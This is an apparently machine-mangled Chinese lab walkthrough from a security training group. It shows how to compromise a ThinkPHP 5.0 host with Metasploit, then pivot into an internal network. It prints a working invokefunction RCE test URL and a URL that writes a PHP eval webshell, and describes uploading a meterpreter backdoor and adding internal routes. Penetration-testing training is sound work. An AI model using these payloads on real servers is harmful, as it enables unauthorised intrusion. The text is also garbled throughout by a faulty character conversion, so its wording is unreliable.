利用Metasploit 打入ThinkPHP內網...

出品｜MS08067實驗室（www.ms08067.com)

本文做者：dch（Ms08067實驗室 SRSP TEAM小組成員）

1、利用Metasploit進行攻擊的流程圖

  Metasploit滲透流程

2、Metasploit滲透攻擊

（1）經過msfconsole命令啓動Metasploit在這個過程當中，系統會主動加載數據庫，如圖2所示：

  啓動Metasploit

（2）使用輔助模塊進行端口掃描，以下圖所示：

  進行掃描

（3）尋找合適的漏洞利用模塊並使用，以下圖所示：

  加載模塊

（4）查看並修改參數，以下圖所示：

  修改參數

（5）利用漏洞 Exploi，以下圖所示：

  漏洞利用

3、實施攻擊

一、靶機 、攻擊機

（1）目標地址 192.168. 222 130
（2）攻擊地址 192.168. 238.129

二、用nmap進行端口掃描（經過端口掃描找到其開放的服務，再根據相關的服務查找與之相對應的漏洞進行利用），如圖7所示

  端口掃描

經過掃描能夠看到Target1發現開放了21（ftp）、22（ssh）、80（http ）、111（RPC）、888 （http）、3306（Mysql）、8888（http）這些端口服務，且是一個Linux 的操做系統。

三、進入web界面

  web界面

打開後發現它是ThinkPHP框架，版本是V5.0，這時候想到它存在一個

RCE（遠程命令執行）漏洞，先用POC（利用程序）測試一下

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

結果以下圖所示

  進行漏洞測試

四、成功出現了PHPinfo界面，說明該版本是存在漏洞的。用POC寫入一句話，寫入一句話到cmd.php：

http://192.168.222.130/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST['cmd']);?>" > cmd.php

五、上傳後，經過蟻劍進行鏈接，發現並不能成功鏈接。發現是$_POST被過濾了，這裏能夠利用編碼（如Base6四、URL）後再次上傳。

六、用蟻劍進行鏈接，成功鏈接。此時已經獲取到該主機的shell，能夠查看系統的信息等。以下圖所示：

  成功得到shell

  查看系統信息

七、根據攻擊機的IP地址及目標靶機的系統類型生成對應的後門文件 ，以下圖所示：

  查看攻擊機IP

  製做後門

八、在kali中配置運行監聽模塊，以下圖所示：

  msf設置監聽

九、經過蟻劍將後門文件shell.elf上傳到靶機中，並賦予777權限以執行，以下圖所示：

  上傳shell.elf後門文件

  賦予777權限執行

十、得到 meterpreter，以下圖所示

  得到meterpreter

十一、查看可用網段，以下圖所示

  查看可用網段

十二、發現兩個網段：一個是192.168.2.0/24，另外一個是192.168.222.0/24，經過meterpreter對192.168.222.0/24添加第二層的路由，以下圖所示

  添加第二層路由

1三、添加成功後進行內網掃描，查看內網中存活的主機，以下圖所示

  查看存活主機

1四、發現第二層靶機192.168.222.128，以下圖所示

  出現第二層網址

1五、在MSF中設置代理

  設置代理

經過設置代理，進行下一步的內網滲透

4、引用文章

  https://www.anquanke.com/post/id/170649

 
 
 

招新

微信聯繫方式：cos2606596924
知足如下要求都可嘗試
1.至少會一門編程語言
2.漏洞平臺上提交過漏洞超過20個
3.每個月一文章分享(考慮有些要上班)‍
 
 
 
 

轉載請聯繫做者並註明出處！

Ms08067安全實驗室專一於網絡安全知識的普及和培訓。團隊已出版《Web安全攻防：滲透測試實戰指南》，《內網安全攻防：滲透測試實戰指南》，《Python安全攻防：滲透測試實戰指南》，《Java代碼安全審計（入門篇）》等書籍。
團隊公衆號按期分享關於CTF靶場、內網滲透、APT方面技術乾貨，從零開始、以實戰落地爲主，致力於作一個實用的乾貨分享型公衆號。
官方網站：https://www.ms08067.com/

掃描下方二維碼加入實驗室VIP社區
加入後邀請加入內部VIP羣，內部微信羣永久有效！